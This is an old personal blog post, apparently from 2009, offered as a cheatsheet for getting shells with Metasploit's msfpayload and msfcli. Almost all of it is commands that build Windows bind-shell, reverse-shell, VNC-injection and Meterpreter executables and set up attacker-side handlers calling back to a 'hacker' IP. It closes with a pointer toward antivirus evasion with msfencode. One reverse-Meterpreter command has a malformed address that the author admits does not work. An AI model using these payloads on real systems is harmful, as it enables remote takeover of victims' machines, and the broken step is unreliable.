Tuesday, November 24, 2009

msfpayload goodness (cheatsheet)

Like one of my favorite blogs, http://synjunkie.blogspot.com, this post is more of a reference to me, cheatsheet if you will. There is so much to know and so little space to store it all in the head. Because msfpayload has been so good to me, i figure i'd do it a favour and spread some of its goodness again. This time, since its been done before, instead of recreating the wheel im just gonna make a duplicate from synjunkies blog. Here it is, your cheatsheet to gaining a shell lol.

Victim, Windows: 192.168.1.110
hacker, Linux: 192.168.1.112
Ports not specified in any example would default to 4444

1. For a listening shell on the target

Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

Target:
run Listen-shell.exe

Hacker:
nc 192.168.1.110 2482



2. For a reverse shell on the target

Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

Target:
run reverse-shell.exe



3. For a VNC listener on target

Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe

Target:
run Listen-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E



4. For a reverse VNC session

Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E

Target:
run reverse-vnc.exe



5. For a meterpreter listener

create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe

Target:
run met-listen.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E



6. For a reverse meterpreter connection (not working yet. not sure why)

Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E

Target:
run met-reverse.exe

Like noted by synjunkie, all these payloads would be detected by most anti-virus systems. I would save methods of avoiding the AV vendors for another blog, but you can take a look at msfencode in the meatime to have an idea of where to start your research.

References/Good reading:
http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html

No comments:

Post a Comment